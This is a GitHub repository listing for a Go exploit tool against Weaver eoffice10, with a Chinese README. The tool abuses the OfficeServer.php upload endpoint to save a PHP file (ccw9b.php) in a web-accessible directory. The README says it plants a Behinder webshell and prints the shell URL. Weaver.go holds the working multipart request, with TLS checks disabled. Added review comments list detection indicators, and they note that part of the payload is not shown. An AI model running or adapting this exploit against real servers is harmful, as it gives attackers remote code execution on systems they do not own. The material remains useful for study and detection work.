├── README.md
├── Weaver.go
├── exp.png
├── getshell.png
└── main.go

/README.md:
--------------------------------------------------------------------------------
# Weaver-Eoffice-getshell exp
泛微 eoffice10 前台 getshell

author:160team.west9B

**仅限用于安全研究人员在授权的情况下使用,遵守网络安全法,产生任何问题,后果自负,与作者无关。**

# 01-基本介绍

泛微 eoffice10 前台getshell,公开日期:2022/7/28

# 02-使用说明

## usage: ./Eoffice10getshell.exe -u url (加http://)

exp上传冰蝎,默认密码,上传成功返回shell地址

poc:访问/eoffice10/server/public/iWebOffice2015/OfficeServer.php返回200存在漏洞,404及其他不存在。

# Screenshots
![Image text](https://github.com/west9b/Weaver-Eoffice-getshell/blob/main/exp.png)
![Image text](https://github.com/west9b/Weaver-Eoffice-getshell/blob/main/getshell.png)

--------------------------------------------------------------------------------
/Weaver.go:
--------------------------------------------------------------------------------
package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

// Weaver sends one multipart POST to url+Eofficepath, then requests
// /eoffice10/server/public/iWebOffice2015/Document/ccw9b.php and reports the
// target as vulnerable only when that second response body is exactly "true\n".
// It takes no arguments and returns nothing: url and Eofficepath are
// package-level variables declared in main.go, and every result is printed to
// standard output.
//
// What the request, as written here, gives a defender to work with:
//   - the POST goes to the OfficeServer.php path with a FileData part declared
//     as filename "1.jpg" / Content-Type image/jpeg, while the FormData part
//     asks for OPTION 'SAVEFILE' under FILENAME 'ccw9b.php', i.e. a declared
//     image paired with a .php save name;
//   - the multipart boundary and the file name ccw9b.php are hard-coded, so
//     both can serve as log and file-system indicators for this specific tool;
//   - the follow-up GET implies the saved file is expected under
//     iWebOffice2015/Document/ (inferred from the path; the server side is not
//     shown on this page).
//
// NOTE(review): POSTs to OfficeServer.php carrying OPTION 'SAVEFILE' with a
// script extension, and unexpected .php files in that Document directory, are
// worth alerting on. Keeping the upload directory non-executable and the
// endpoint off untrusted networks limits the impact; confirm the affected
// versions and the fix with the vendor, since this page names neither.
func Weaver() {
	fmt.Println("\n-----------------------✂---------------------------")
	fmt.Println("泛微 eoffice10 前台getshell 公开日期:2022/7/28")
	fmt.Println("\n-----------------------✂---------------------------")
	// Certificate verification is switched off for this client, so the POST
	// is sent even when the target presents an untrusted certificate.
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: true,
		},
	}
	client := &http.Client{Transport: tr}
	// The request body is a hand-written multipart document held in a raw
	// string literal.
	// NOTE(review): in this listing the FileData part shows only the line
	// "true"; the line numbering of the listing this page was taken from jumps
	// from 28 to 54 at that point, so the rest of that part is not on this page.
	req, err := http.NewRequest("POST", url+Eofficepath, strings.NewReader(
		`
------WebKitFormBoundarygfpd61aYDAKQ11RF
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg

true

------WebKitFormBoundarygfpd61aYDAKQ11RF
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'ccw9b.php'}
------WebKitFormBoundarygfpd61aYDAKQ11RF--
`))
	if err != nil {
		// NOTE(review): empty branch. A NewRequest error is ignored, and req
		// would be nil when the headers are set on the next lines.
	}
	// The boundary in this header has to match the one written into the body.
	req.Header.Add("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarygfpd61aYDAKQ11RF")
	req.Header.Add("Connection", "close")
	resp, err := client.Do(req)
	if err != nil {
		// Any transport error is reported with the "not vulnerable" message.
		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
		return
	}
	// The POST response is only closed; its status and body are never read.
	defer resp.Body.Close()

	// Second request: fetch the file name that the FormData part asked for.
	responseGet, err1 := http.Get(url + "/eoffice10/server/public/iWebOffice2015/Document/ccw9b.php")
	if err1 != nil {
		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
		return
	}
	defer responseGet.Body.Close()
	// The read error is discarded; on failure s holds whatever was read so far.
	s, _ := ioutil.ReadAll(responseGet.Body)
	// The raw response body is echoed to stdout before it is compared.
	fmt.Printf("%s", s)
	// The status code is not checked: the verdict rests only on the body being
	// the "true" line followed by a newline.
	if string(s) == "true\n" {
		fmt.Println("存在泛微 eoffice10 前台getshell漏洞")
		fmt.Println("冰蝎地址:", url+"/eoffice10/server/public/iWebOffice2015/Document/ccw9b.php")
	} else {
		fmt.Println("不存在泛微 eoffice10 前台getshell漏洞")
	}

}

--------------------------------------------------------------------------------
/exp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/west9b/Weaver-Eoffice-getshell/9ef165342c26021c80e4f74ea21c8bb0c1460237/exp.png

--------------------------------------------------------------------------------
/getshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/west9b/Weaver-Eoffice-getshell/9ef165342c26021c80e4f74ea21c8bb0c1460237/getshell.png

--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
package main

//author:160team.west9B
import (
	"flag"
	"fmt"
)

var (
	// url is the target base URL, filled from the -u flag in init.
	url string
	// Eofficepath is the request path that Weaver appends to url for its POST.
	Eofficepath = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
)

// init registers the -u flag. Its default is the literal string "null", which
// main treats as "no target given".
func init() {
	flag.StringVar(&url,
		"u",
		"null",
		"url:http://127.0.0.1/",
	)

}

// main parses the flags, prints the author banner, and calls Weaver when -u
// was set to anything other than "null"; otherwise it prints the usage line.
// NOTE(review): the value of -u is not validated before Weaver concatenates it
// with the request paths.
func main() {
	flag.Parse()
	fmt.Println("author:160team.west9b")
	if url != "null" {
		Weaver()
		return
	}
	fmt.Println("usage_poc:WeaverGetshell.exe -u url")
}

--------------------------------------------------------------------------------